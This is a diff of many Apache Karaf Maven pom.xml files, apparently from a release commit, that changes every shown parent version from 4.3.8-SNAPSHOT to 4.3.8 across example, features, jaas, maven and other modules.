examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-api/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-eclipselink/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-hibernate/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-openjpa/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-eclipselink/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-hibernate/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-openjpa/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/karaf-log-appender-example-core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-log-appender-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/karaf-log-appender-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-log-appender-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/karaf-maven-example-run-bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-maven-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/karaf-maven-example-run/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-maven-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-simple/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-service/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-cxf/pom.xml+1 −1 modified@@ -17,7 +17,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-jersey/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-whiteboard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/karaf-scheduler-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scheduler-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/karaf-scheduler-example-runnable/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scheduler-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-annotation/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-registration/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-upload/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/karaf-url-namespace-handler-example-core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-url-namespace-handler-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/karaf-url-namespace-handler-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-url-namespace-handler-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-url-namespace-handler-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/karaf-war-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-war-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/karaf-war-example-webapp/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-war-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-war-example/pom.xml+1 −1 modified@@ -25,7 +25,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-websocket-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
features/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
features/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
features/extension/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
instance/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
itests/common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.itests</groupId> <artifactId>itests</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
itests/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
itests/test/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.itests</groupId> <artifactId>itests</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas.blueprint</groupId> <artifactId>blueprint</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/jasypt/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas.blueprint</groupId> <artifactId>blueprint</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/boot/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>jaas</artifactId> <groupId>org.apache.karaf.jaas</groupId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/jasypt/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/modules/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jaas/spring-security-crypto/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.jaas</groupId> <artifactId>jaas</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jdbc/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jms/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
jndi/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
log/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
main/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
management/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
management/server/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.management</groupId> <artifactId>management</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
manual/pom.xml+1 −1 modified@@ -17,7 +17,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
maven/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../../pom.xml</relativePath> </parent>
maven/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
obr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
package/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
